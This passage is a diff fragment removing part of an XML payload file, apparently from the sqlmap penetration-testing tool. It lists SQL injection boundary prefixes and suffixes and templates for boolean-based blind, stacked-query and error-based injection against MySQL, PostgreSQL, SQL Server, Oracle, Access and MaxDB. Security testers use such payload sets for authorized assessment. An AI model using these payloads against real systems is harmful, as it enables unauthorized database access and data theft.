-        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%00'</prefix>
-        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix></prefix>
-        <suffix>-- [RANDSTR]</suffix>
-    </boundary>
-    <!-- End of WHERE/HAVING clause boundaries -->
-
-
-    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-    <!-- End of pre-WHERE generic boundaries -->
-
-    <!-- Pre-WHERE derived table boundaries (e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-    <!-- End of pre-WHERE derived table boundaries -->
-
-    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>1</ptype>
-        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
-    </boundary>
-    <!-- End of INSERT/UPDATE generic boundaries -->
-
-    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>' IN BOOLEAN MODE)</prefix>
-        <suffix>#</suffix>
-    </boundary>
-    <!-- End of AGAINST boolean full-text search boundaries -->
-
-    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause</title>
-        <stype>1</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [INFERENCE]</vector>
-        <request>
-            <payload>AND [RANDNUM]=[RANDNUM]</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ([INFERENCE])</vector>
-        <request>
-            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
-        <request>
-            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
-        </request>
-        <response>
-            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
-
-    <!-- Boolean-based blind tests - Parameter replace -->
-    <test>
-        <title>Generic boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
-        <request>
-            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
-        </request>
-        <response>
-            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
-        <request>
-            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
-        </request>
-        <response>
-            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>([INFERENCE])*[ORIGVALUE]</vector>
-        <request>
-            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
-        </request>
-        <response>
-            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
-        <request>
-            <payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
-        </request>
-        <response>
-            <comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
-        <request>
-            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
-        </request>
-        <response>
-            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft Access</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
-        <request>
-            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
-        </request>
-        <response>
-            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-    <!-- End of boolean-based blind tests - Parameter replace -->
-
-
-    <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
-        <request>
-            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
-        </request>
-        <response>
-            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft Access</dbms>
-        </details>
-    </test>
-    <!-- TODO: check against SAP MaxDB -->
-    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
-
-
-    <!-- Stacked conditional-error blind queries tests -->
-    <test>
-        <title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
-        <request>
-            <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL stacked conditional-error blind queries</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>2</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
-        <request>
-            <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-    <!-- End of stacked conditional-error blind queries tests -->
-
-    <!-- Error-based tests - WHERE or HAVING clause -->
-    <test>
-        <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
-        <request>
-            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 4.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
-        <request>
-            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
